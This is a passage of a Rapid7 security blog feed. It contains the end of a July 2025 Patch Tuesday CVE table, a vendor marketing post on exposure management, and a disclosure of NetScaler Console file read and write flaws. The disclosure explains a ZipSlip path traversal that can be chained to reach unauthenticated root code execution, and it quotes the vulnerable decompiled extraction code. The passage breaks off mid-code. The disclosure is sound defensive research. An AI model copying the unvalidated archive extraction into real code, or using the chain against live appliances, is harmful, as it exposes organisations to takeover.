href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49705">CVE-2025-49705</a></td><td><p>Microsoft PowerPoint Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49702">CVE-2025-49702</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47994">CVE-2025-47994</a></td><td><p>Microsoft Office Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49711">CVE-2025-49711</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49737">CVE-2025-49737</a></td><td><p>Microsoft Teams Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49699">CVE-2025-49699</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49706">CVE-2025-49706</a></td><td><p>Microsoft SharePoint Server Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48812">CVE-2025-48812</a></td><td><p>Microsoft Excel Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49756">CVE-2025-49756</a></td><td><p>Office Developer Platform Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>3.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49731">CVE-2025-49731</a></td><td><p>Microsoft Teams Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>3.1</p></td></tr></tbody></table><h3></h3><h3>SQL Server vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49717">CVE-2025-49717</a></td><td><p>Microsoft SQL Server Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49719">CVE-2025-49719</a></td><td><p>Microsoft SQL Server Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>Yes</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49718">CVE-2025-49718</a></td><td><p>Microsoft SQL Server Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr></tbody></table><h3></h3><h3>System Center vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47178">CVE-2025-47178</a></td><td><p>Microsoft Configuration Manager Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr></tbody></table><h3></h3><h3>Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49723">CVE-2025-49723</a></td><td><p>Windows StateRepository API Server file Tampering Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49740">CVE-2025-49740</a></td><td><p>Windows SmartScreen Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49724">CVE-2025-49724</a></td><td><p>Windows Connected Devices Platform Service Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48822">CVE-2025-48822</a></td><td><p>Windows Hyper-V Discrete Device Assignment (DDA) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.6</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33054">CVE-2025-33054</a></td><td><p>Remote Desktop Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49691">CVE-2025-49691</a></td><td><p>Windows Miracast Wireless Display Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47972">CVE-2025-47972</a></td><td><p>Windows Input Method Editor (IME) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47159">CVE-2025-47159</a></td><td><p>Windows Virtualization-Based Security (VBS) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48799">CVE-2025-48799</a></td><td><p>Windows Update Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47982">CVE-2025-47982</a></td><td><p>Windows Storage VSP Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49726">CVE-2025-49726</a></td><td><p>Windows Notification Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49725">CVE-2025-49725</a></td><td><p>Windows Notification Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47991">CVE-2025-47991</a></td><td><p>Windows Input Method Editor (IME) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48000">CVE-2025-48000</a></td><td><p>Windows Connected Devices Platform Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48820">CVE-2025-48820</a></td><td><p>Windows AppX Deployment Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49733">CVE-2025-49733</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47993">CVE-2025-47993</a></td><td><p>Microsoft PC Manager Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49694">CVE-2025-49694</a></td><td><p>Microsoft Brokering File System Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49693">CVE-2025-49693</a></td><td><p>Microsoft Brokering File System Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49690">CVE-2025-49690</a></td><td><p>Capability Access Management Service (camsvc) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49680">CVE-2025-49680</a></td><td><p>Windows Performance Recorder (WPR) Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49682">CVE-2025-49682</a></td><td><p>Windows Media Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49666">CVE-2025-49666</a></td><td><p>Windows Server Setup and Boot Event Collection Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49685">CVE-2025-49685</a></td><td><p>Windows Search Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49744">CVE-2025-49744</a></td><td><p>Windows Graphics Component Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49677">CVE-2025-49677</a></td><td><p>Microsoft Brokering File System Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47999">CVE-2025-47999</a></td><td><p>Windows Hyper-V Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48003">CVE-2025-48003</a></td><td><p>BitLocker Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48800">CVE-2025-48800</a></td><td><p>BitLocker Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48818">CVE-2025-48818</a></td><td><p>BitLocker Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48811">CVE-2025-48811</a></td><td><p>Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48803">CVE-2025-48803</a></td><td><p>Windows Virtualization-Based Security (VBS) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48802">CVE-2025-48802</a></td><td><p>Windows SMB Server Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47978">CVE-2025-47978</a></td><td><p>Windows Kerberos Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48823">CVE-2025-48823</a></td><td><p>Windows Cryptographic Services Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48002">CVE-2025-48002</a></td><td><p>Windows Hyper-V Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-36357">CVE-2025-36357</a></td><td><p>AMD: CVE-2025-36357 Transient Scheduler Attack in L1 Data Queue</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.6</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-36350">CVE-2025-36350</a></td><td><p>AMD: CVE-2024-36350 Transient Scheduler Attack in Store Queue</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.6</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48809">CVE-2025-48809</a></td><td><p>Windows Secure Kernel Mode Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48810">CVE-2025-48810</a></td><td><p>Windows Secure Kernel Mode Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26636">CVE-2025-26636</a></td><td><p>Windows Kernel Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49760">CVE-2025-49760</a></td><td><p>Windows Storage Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>3.5</p></td></tr></tbody></table><h2>Update history</h2><ul><li>2025-07-11: updated section about missing Microsoft security advisories.</li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/patch-tuesday-july-2025</link>
      <guid isPermaLink="false">blt3f5526be2cd4cf79</guid>
      <category><![CDATA[Patch Tuesday]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Adam Barnett]]></dc:creator>
      <pubDate>Tue, 15 Jul 2025 09:30:13 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt76ee31e15f145bd9/6849a5d2dc186db607081f3e/patch-tuesday-repeated.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Why Traditional Vulnerability Management Isn’t Working  and What to Do Instead]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Security teams are under more pressure than ever. With attack surfaces growing, regulations tightening, and the average breach cost climbing, it's no surprise that many organizations are rethinking how they approach </span><a href="https://www.rapid7.com/fundamentals/ai-vulnerability-management-platform/" target="_self"><span style='font-size: undefined;'>vulnerability management</span></a><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>But here’s the catch: knowing where your vulnerabilities are isn’t the same as knowing how to fix them or whether they even matter.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In our latest whitepaper, </span><a href="https://www.rapid7.com/lp/unified-exposure-management-whitepaper/" target="_self"><span style='font-size: undefined;'><strong>Unified Exposure Management: Uncovering Unknown Assets and Vulnerabilities</strong></span></a><span style='font-size: undefined;'>, we take a hard look at the limitations of traditional VM and what it really takes to keep up with modern attackers.</span></p><h2><strong>What’s broken?</strong></h2><p style="direction: ltr;"><span style='font-size: undefined;'>The classic scan-and-patch routine was built for a different time — when assets were static, environments were simpler, and security teams weren’t stretched so thin. Today, vulnerabilities don’t just live on endpoints. They span hybrid cloud infrastructure, third-party apps, misconfigured identities, and external services.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Meanwhile, attackers have adapted. They don’t think in CVEs, they think in paths. They chain exposures together to move laterally, escalate privileges, and reach your crown jewels. Yet too many teams are still sorting vulnerabilities by CVSS scores and calling it risk management.</span></p><h2><strong>What’s needed instead?</strong></h2><p style="direction: ltr;"><span style='font-size: undefined;'>You can’t secure what you can’t see. And you can’t prioritize what you don’t understand. That’s why a unified approach - one that combines asset, identity, and threat context  is now essential.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Unified Exposure Management</strong></span><span style='font-size: undefined;'> changes the game by helping you:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Continuously discover unknown assets and identities</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Understand real-world exploitability, not just severity</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Prioritize what truly matters based on business impact</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Remediate exposures faster and more collaboratively</span></p></li></ul><h2><strong>How Rapid7 can help</strong></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Our platform, </span><a href="https://www.rapid7.com/products/command/exposure-management/" target="_self"><span style='font-size: undefined;'><strong>Exposure Command</strong></span></a><span style='font-size: undefined;'>, gives security leaders a single source of truth across cloud, on-prem, SaaS, and user access. It’s designed to help teams move from reactive triage to proactive risk reduction — and give CISOs a clearer picture of where risk lives, how it moves, and how to stop it.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Want the full breakdown? </span><a href="https://www.rapid7.com/lp/unified-exposure-management-whitepaper/" target="_self"><span style='font-size: undefined;'>Download our whitepaper here</span></a><span style='font-size: undefined;'>. </span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/why-traditional-vulnerability-management-isn-t-working-and-what-to-do-instead</link>
      <guid isPermaLink="false">blteb922a7e89f10809</guid>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Mon, 14 Jul 2025 16:07:56 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf348eadfed714dc1/68556316477d04b78dccc259/Unified-exposure-managemnt-whitepaper-thumbnail_(1).png" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2025-4365/CVE-2024-12284: NetScaler Console/SDX Authenticated Arbitrary File Read/Write (FIXED)]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>During root cause analysis for the NetScaler Console vulnerability, </span><span style='font-size: undefined;'><span data-type='inlineCode'>CVE-2024-6235</span></span><span style='font-size: undefined;'>, Rapid7 discovered two high severity authenticated arbitrary file read and write vulnerabilities which were disclosed to the vendor in accordance with our </span><a href="https://www.rapid7.com/security/disclosure/"><span style='font-size: undefined;'>disclosure policy</span></a><span style='font-size: undefined;'>. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>An Arbitrary File Read vulnerability (</span><span style='font-size: undefined;'><span data-type='inlineCode'>CVE-2025-4365</span></span><span style='font-size: undefined;'>) was identified in NetScaler Console version </span><span style='font-size: undefined;'><span data-type='inlineCode'>14.1.8.50</span></span><span style='font-size: undefined;'> and found to affect versions of NetScaler Console and NetScaler SDX </span><span style='font-size: undefined;'><span data-type='inlineCode'>14.1</span></span><span style='font-size: undefined;'> before </span><span data-type='inlineCode'>14.1.47.46</span> and <span data-type='inlineCode'>13.1</span> before <span data-type='inlineCode'>13.1.58.32</span>, as per the vendor <a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694729&amp;articleURL=NetScaler_Console_and_NetScaler_SDX_SVM_Security_Bulletin_for_CVE_2025_4365" target="_self">advisory</a>.</p><p style="direction: ltr;"><span style='font-size: undefined;'>An Arbitrary File Write vulnerability was identified in NetScaler Console version </span><span style='font-size: undefined;'><span data-type='inlineCode'>14.1.8.50</span></span><span style='font-size: undefined;'>. After disclosing to the vendor, the vendor reported this issue as already being fixed in the latest version of the product. The vendor, who is a Vendor CVE Numbering Authority (CNA), has indicated that no CVE will be assigned for this Arbitrary File Write vulnerability as it did not affect the latest version of the product at the time of disclosure. With no CVE assigned, and no vendor security bulletin available for this vulnerability, it is not clear which versions of the product are affected by this vulnerability, outside of the versions Rapid7 was able to test (</span><span style='font-size: undefined;'><span data-type='inlineCode'>14.1.8.50</span></span><span style='font-size: undefined;'> which was vulnerable, and </span><span style='font-size: undefined;'><span data-type='inlineCode'>14.1.29.63</span></span><span style='font-size: undefined;'> which was not vulnerable). As the vulnerability is known to be fixed in the latest version of the product, affected users can update to the latest version in order to remediate it.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Both of these vulnerabilities can be chained with the authentication bypass vulnerability </span><a href="https://attackerkb.com/topics/7zebEgmGLs/cve-2024-6235" target="_self"><span style='font-size: undefined;'><span data-type='inlineCode'>CVE-2024-6235</span></span></a><span style='font-size: undefined;'>, to exploit them without authentication.</span></p><p><em>Update June 27, 2025:</em> After further investigation from the vendor, it has been determined that the Arbitrary File Write vulnerability should be identified as CVE-2024-12284. This vulnerability is now known to affect both NetScaler Console and NetScaler Agent <span data-type='inlineCode'>14.1</span> before <span data-type='inlineCode'>14.1-38.53</span>, and <span data-type='inlineCode'>13.1</span> before <span data-type='inlineCode'>13.1-56.18,</span> as per the vendor <a href="https://support.citrix.com/external/article?articleUrl=CTX692579-netscaler-console-and-netscaler-agent-security-bulletin-for-cve202412284&amp;language=en_US" target="_self">advisory</a>.</p><h2><span style='font-size: undefined;'>Product Description</span></h2><p style="direction: ltr;"><a href="https://docs.netscaler.com/en-us/netscaler-application-delivery-management-software" target="_self"><span style='font-size: undefined;'>NetScaler Console</span></a><span style='font-size: undefined;'> (previously ADM) is a platform for policy management across devices and applications in an organization, often deployed at the edge of a corporate network, and hence an attractive target for ransomware operators. </span></p><h2><span style='font-size: undefined;'>Impact</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>By exploiting these issues, an authenticated attacker can read or create arbitrary files on the file system. As the Arbitrary File Write can create files with permissions akin to the root user, it's possible to leverage this to achieve remote code execution as root. By chaining these issues with the authentication bypass </span><span style='font-size: undefined;'><span data-type='inlineCode'>CVE-2024-6235</span></span><span style='font-size: undefined;'>, an attacker can achieve unauthenticated remote code execution.</span></p><h2><span style='font-size: undefined;'>Credit</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>These vulnerabilities were discovered by Calum Hutton, Senior Security Researcher at Rapid7 and are being disclosed in accordance with </span><a href="https://www.rapid7.com/security/disclosure/" target="_self"><span style='font-size: undefined;'>Rapid7's vulnerability disclosure policy</span></a><span style='font-size: undefined;'>.</span></p><h2>Exploitation</h2><h3>CVE-2024-12284<span style='color:rgb(67, 67, 67);font-size: undefined;'>: Authenticated Arbitrary File Write via ZipSlip</span></h3><h4><span style='color:rgb(102, 102, 102);font-size: undefined;'>Overview</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>An authenticated admin user can import </span><a href="https://docs.netscaler.com/en-us/netscaler-console-service/stylebooks.html" target="_self"><span style='font-size: undefined;'>StyleBooks</span></a><span style='font-size: undefined;'> into the system in several formats including </span><span style='font-size: undefined;'><span data-type='inlineCode'>ZIP</span></span><span style='font-size: undefined;'> or </span><span style='font-size: undefined;'><span data-type='inlineCode'>TAR</span></span><span style='font-size: undefined;'> archives. A lack of validation of the files within the archive prior to extraction results in an arbitrary file write, due to path traversal characters in the path of a file within the archive (aka ZipSlip). As the process performing the archive extraction is running with permissions equivalent to root, the file can be written to any path on the system and can lead to remote command execution as the root user.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The StyleBook API runs as a separate Python microservice on the NetScaler appliance. We determined that the source code was likely located in </span></p><p><span style='font-size: undefined;'></span></p><pre language="html">bash-3.2# ls -la /var/python/lib/python3.7/site-packages/NetScalerStyleBooks-1.0-py3.7.egg/
EGG-INFO/         SBConfigEngine/   SBException/      SBInfra/          SBMigration/      SBParser/         stylebook_engine/ tests_unittest/</pre><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>Using </span><span style='font-size: undefined;'><span data-type='inlineCode'>uncompye6</span></span><span style='font-size: undefined;'> it was possible to decompile the Python bytecode </span><span style='font-size: undefined;'><span data-type='inlineCode'>.pyc</span></span><span style='font-size: undefined;'> files back into </span><span style='font-size: undefined;'><span data-type='inlineCode'>.py</span></span><span style='font-size: undefined;'> files. We located the API logic responsible for handling the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/stylebook/nitro/v2/config/stylebooks/actions/import</span></span><span style='font-size: undefined;'> API endpoint in the SBEngineStyleBookRestAPIHandler class:</span></p><p><span style='font-size: undefined;'></span></p><pre language="html"><span style='font-size: undefined;'>from mpspython.infra.mpsfile import MPSFile as SBFile

class SBEngineStyleBookRestAPIHandler(STYLEBOOKENGINEResource):
</span>    <span style='font-size: undefined;'>...
</span>   <span style='font-size: undefined;'>def do_post(self, input_data=None, block_types=None):
</span>        <span style='font-size: undefined;'>self.info("Received request to import a stylebook definition")
</span>        <span style='font-size: undefined;'>try:
</span>            <span style='font-size: undefined;'>sb_list, sb_bundle_dir = self._validate_and_get_input_data(input_data)
...
</span>    <span style='font-size: undefined;'>def _validate_and_get_input_data(self, input_data=None, is_update_stylebook=False):
</span>        <span style='font-size: undefined;'>...
</span>                <span style='font-size: undefined;'>if "content" in definition:
</span>                    <span style='font-size: undefined;'>if "file_name" in definition:
</span>                        <span style='font-size: undefined;'>contents = base64.b64decode(definition["content"])
</span>                        <span style='font-size: undefined;'>file_name = definition["file_name"]
</span>                        <span style='font-size: undefined;'>self.is_bundle = True
</span>                        <span style='font-size: undefined;'>is_filename_secure = SBUtil.is_filename_secure(file_name)
</span>                        <span style='font-size: undefined;'>if not is_filename_secure:
</span>                            <span style='font-size: undefined;'>self.logger.error("Insecure stylebook bundle name")
</span>                            <span style='font-size: undefined;'>self.raise_exception(524, "error", "Filename has invalid characters")
</span>                        <span style='font-size: undefined;'>directory_name = file_name + "_" + SBUtil.get_new_uid()
</span>                        <span style='font-size: undefined;'>full_path = self.sb_session.get_tenant_stylebook_import_bundle_path() + "/" + directory_name
</span>                        <span style='font-size: undefined;'>SBFile.create_directory(full_path)
</span>                        <span style='font-size: undefined;'>zip_file_path = full_path + "/" + file_name
</span>                        <span style='font-size: undefined;'>SBFile.safe_write(zip_file_path, contents)
</span>                        <span style='font-size: undefined;'>try:
</span>                            <span style='font-size: undefined;'>SBFile.unzip_file(zip_file_path, full_path)
</span>                        <span style='font-size: undefined;'>except Exception as e:</span></pre><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>The </span><span style='font-size: undefined;'><span data-type='inlineCode'>do_post()</span></span><span style='font-size: undefined;'> method calls </span><span style='font-size: undefined;'><span data-type='inlineCode'>_validate_and_get_input_data()</span></span><span style='font-size: undefined;'> with the request data, which processes the JSON payload and decodes the base64 within the </span><span style='font-size: undefined;'><span data-type='inlineCode'>content</span></span><span style='font-size: undefined;'> attribute. The file data is written using </span><span style='font-size: undefined;'><span data-type='inlineCode'>SBFile.safe_write()</span></span><span style='font-size: undefined;'>, then the </span><span style='font-size: undefined;'><span data-type='inlineCode'>SBFile.unzip_file()</span></span><span style='font-size: undefined;'> method is called. The </span><span style='font-size: undefined;'><span data-type='inlineCode'>SBFile</span></span><span style='font-size: undefined;'> object is imported at the top of the file and is an alias of </span><span style='font-size: undefined;'><span data-type='inlineCode'>mpspython.infra.mpsfile.MPSFile</span></span><span style='font-size: undefined;'>, located in </span><span style='font-size: undefined;'><span data-type='inlineCode'>/var/python/lib/python3.7/site-packages/MPSPython-1.0-py3.7.egg</span></span><span style='font-size: undefined;'>: </span></p><p><span style='font-size: undefined;'></span></p><pre language="html"><span style='font-size: undefined;'>class MPSFile(object):
</span>    <span style='font-size: undefined;'>...

</span>    <span style='font-size: undefined;'>@staticmethod
</span>        <span style='font-size: undefined;'>def unzip_file(src_file, dest_file_path):
</span>        <span style='font-size: undefined;'>if src_file.endswith(".tgz") or src_file.endswith(".gz"):
</span>            <span style='font-size: undefined;'>execute = 100
</span>            <span style='font-size: undefined;'>read = 400
</span>            <span style='font-size: undefined;'>dir_perm = execute
</span>            <span style='font-size: undefined;'>file_perm = execute | read
</span>            <span style='font-size: undefined;'>tar = tarfile.open(src_file)
</span>            <span style='font-size: undefined;'>for tarinfo in tar.getmembers():
</span>                <span style='font-size: undefined;'>tarinfo.mode |= dir_perm if tarinfo.isdir() else file_perm

</span>            <span style='font-size: undefined;'>tar.extractall(dest_file_path)
</span>            <span style='font-size: undefined;'>tar.close()
